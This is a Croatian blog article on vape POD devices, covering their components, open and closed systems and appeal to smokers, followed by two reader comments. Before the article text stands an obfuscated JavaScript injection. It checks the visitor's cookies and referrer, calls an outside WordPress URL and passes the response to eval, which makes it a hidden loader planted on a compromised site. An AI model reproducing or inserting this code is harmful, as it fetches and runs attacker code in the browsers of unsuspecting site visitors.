;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Što su vape PODovi

Što su Vape POD-ovi

Svijet e cigareta je brzo napredovao i sada je pun čuda i inovacija, od otkačenih atomizera i modova do najneobičnijih tekućina i drugih dodataka. Konkurencija je velika i među brojnim proizvođačima koji vladaju industrijom, vidjeli smo proizvode koji se kreću od superskupih do onih jednokratnih, a upravo je ta raznolikost djelomično ono što privlači ljude u svijet vejpa – sami uređaji su stvarno cool, a puniti ih vašim omiljenim tekućinama nedvojbeno je zabavno. Uvijek postoji nešto novo za isprobati, bilo da se radi o modovima ili ukusima, mogućnosti su donekle beskrajne.

Ne zaboravimo, međutim, razlog zašto su e cigarete nastale je taj što nude sigurniju alternativu pušenju. Nema stvarne preostale kontroverze u argumentu para protiv duhana. Stvar je u tome da su se vapeovi od obične zamjene za duhan prevezli u samostalni entitet i iz tog razloga mnogi vaperi nastavljaju pušiti cigarete uz svoje vape.

Tržište vapea odgovorilo je na to  POD modom, koji, među svojim brojnim hirovima i karizmama, nudi metodu vapinga koja usko replicira naviku pušenja.

Komponente POD moda

KOMPONENTE POD MODA
KOMPONENTE POD MODA

POD-ovi su minijaturizirani vape uređaji koji se obično sastoje od 4 ili 5 dijelova:

 • Zamjenjiv POD spremnik (tu se nalazi vaša e-tekućina i grijač).
 • Indikator baterije
 • USB priključak/utor za punjenje.
 • Glavno tijelo
 • Prekidač za uključivanje/isključivanje.

Postoje dva osnovna tipa POD modova – zatvoreni i otvoreni POD sistemi. Oni otvoreni vam omogućuju punjenje i modificiranje e-tekućine putem spremnika koji se može ukloniti. Zatvoreni sistem treba napuniti namjenski izrađenim spremnicima za jednokratnu upotrebu.

Nedavni razvoj POD-ova stvarno je poremetio svijet e cigareta. Ipak su to uređaji za vaping koji se uglavnom ne mogu previše modificirati i općenito koriste jednu kapsulu napunjene tekućine koja je jednokratna ili u novije vrijeme punjive spremnike u koju sami točite tekućinu po izboru. Na prvi pogled, ovo se čini inferiorno u odnosu na konvencionalni vape u gotovo svakom pogledu, pa zašto su onda eksplodirali u popularnosti?

Pod mod je zabavna, praktična i učinkovita alternativa tradicionalnom vapeu, a nudi nešto novo i drugačije kako za dugoročne tako i za nove vapere. Njegov format promiče kratkotrajnu upotrebu, slično kao i pušenje cigareta.

Kako koristiti POD modove

S prijašnjim modelima pod modova, jednostavno biste napunili kapsulu, upotrijebili vape i zatim bacili kapsulu kada se potroši. Potom možete ubaciti drugu kapsulu ili ih, u nekim novijim modelima, možete ponovno napuniti. Prilično jednostavno!

Pod mod uređaji su obično vrlo mali i mogu lakše stati u džep nego konvencionalni vape. Oni su smješteni negdje između vrste e-cigareta koje možete kupiti u supermarketima i potpunog vapea. Stvar je u tome što s pod modovima dobivate pristup kvalitetnoj pari i mnogim okusima. Oni su profesionalni paket i dolaze s profesionalnim rezultatima zahvaljujući komponentama koje su uvelike iste kao i u konvencionalnim vape modovima s atomizerom. Imaju kvalitetnu izradu i ne štede na komponentama performansi. To je ono što im je omogućilo da premoste jaz na tržištu između većih e-cigareta i manjih e-cigareta. Pod modovi imaju dobre baterije i atraktivno su smješteni u metalnim kućištima, što ih čini dugotrajnom opcijom za vapere. Mnoge proizvode vape tvrtke na koje smo svi navikli – to su jedinice vrhunske kvalitete koje su napravljene da traju.

Dakle, u osnovi, modovi se ne razlikuju toliko od konvencionalnih vapeova, ali kada razmislite, njihov način korištenja se razlikuje od uobičajenih modova s atomizerom.

PODovi za pušače

Pod modovi su stekli popularnost među onima koji prelaze s pušenja na parenje. Oni mogu oponašati naviku pušenja mnogo više nego konvencionalni vape. Napunite svoju kapsulu, parite, a kada ste gotovi, imate izbor ubacivanja druge kapsule. Mnogi bi mogli reći da je to praktički isto kao i vapanje na normalan način, ali su često oblikovani više kao cigarete nego konvencionalni vape. Općenito, mnogi pušači vjeruju da POD učinkovitije zamjenjuje naviku pušenja od konvencionalnog vapea.

Da ne spominjemo veću dozu nikotina koju nikotin na bazi soli može nositi, a da ne rezultira zviždanjem ili grubošću, što omogućuje pušačima da u jednom potezu unesu više nikotina. Učinkovitije i učinkovitije zadovoljavajući žudnju, a što je ključno za teške pušače, ukida one žudnje koje se pojavljuju tijekom dana, a koje obično rezultiraju da neki vaperi povremeno posegnu za cigaretom.

Kako PODovi rade?

Pod modovi rade uglavnom na isti način kao i konvencionalni vape, a mnoge komponente su slične. Osnove su identične – grijač se koristi zajedno s baterijom za zagrijavanje e-tekućine i pretvaranje u paru. Većina modova za podove se ne aktivira tipkom za paljenje, jednostavno izvlačite iz nastavka za usta i udišete svoju paru. Zasigurno su sposobni proizvesti impresivne oblake i jake okuse, ali korisnici koji su navikli na dl atomizere vjerojatno neće biti zadovoljni. Ovo nije poanta pod moda – oni su dizajnirani da daju paru kad i gdje vam zatreba uz minimalnu buku ili gnjavažu.

Kada su pod modovi prvi put stupili na scenu, bili su zatvoreni sustavi što je značilo da ne možete koristiti vlastite okuse, itd. Sada postoji mnoštvo modela koji imaju spremnike za ponovno punjenje ili čak imaju male ugrađene spremnike. U ovoj fazi, pod modovi postaju vrlo blisko povezani s malim prijenosnim modelima modova s atomizerima. Isplativi su i neće vam dosaditi s dostupnim okusima.

POD ili MOD, pitanje je sad

Pod modovi su jednostavni i učinkoviti, i to je njihova čar. Oni daju optimalnu količinu pare kada vam je najpotrebnija. Ako ovo zvuči kao nešto što vam treba ili bi vam moglo imati koristi, trebali biste ih isprobati. Ako ste vaper koji cijeli dan puše oblake, onda vjerojatno i nisu toliko korisni!

U svakom slučaju, pod modovi izgledaju kao nešto što će opstati na tržištu i generalno u svijetu vejpa. Pogotovo mogu odgovarati novim vaperima ili mogu biti savršeni pratioci većih vape kompleta.

Pod modovi se stalno razvijaju, a predviđamo da će jedinice postati još manje uz zadržavanje profesionalnosti u dosljednosti, pouzdanosti i kvaliteti pare.

Choose your Reaction!
 • Eh, ja sam isto krenuo u Vape sa “POD-ovima”. Prvo Wiip, pa nakon njega Geekvape Frenzy koji je bolji 20x od Wiipa iz više razloga.
  Sad u kućanstvu postoji jedan Wiip i jedan Caliburn G, a najvjerovatnije će im se uskoro pridružiti i Smok Nord 4.
  Mada jesu POD-ovi ok za start u Vaping kod početnika, isto tako ne daju pravi uvid u sve mogućnosti Vejpanja.
  Osobno bih povremeno možda i koristio nekakav POD, ali nema ni teoretske šanse da bih zamjenio RTA atomizere i prave modove s POD modom.

 • Ma podovi su odlični! U vape svijet sam ušao uz Argus Air i Drag X, ali sam ih brzo zamijenio s drugim modovima i “pravim” atomizerima jer sam skontao da će mi na dugoročno biti puno isplativije (žica i pamuk vs. gotovi grijači od cca 20-30 kn koji drže 2-3 tjedna max).
  Ipak, malo tu i tamo zažaim, jer su mi Voopoo grijači davali baš fenomenalni okus pojedinih tekućina, ali što je tu je :)

Leave a Comment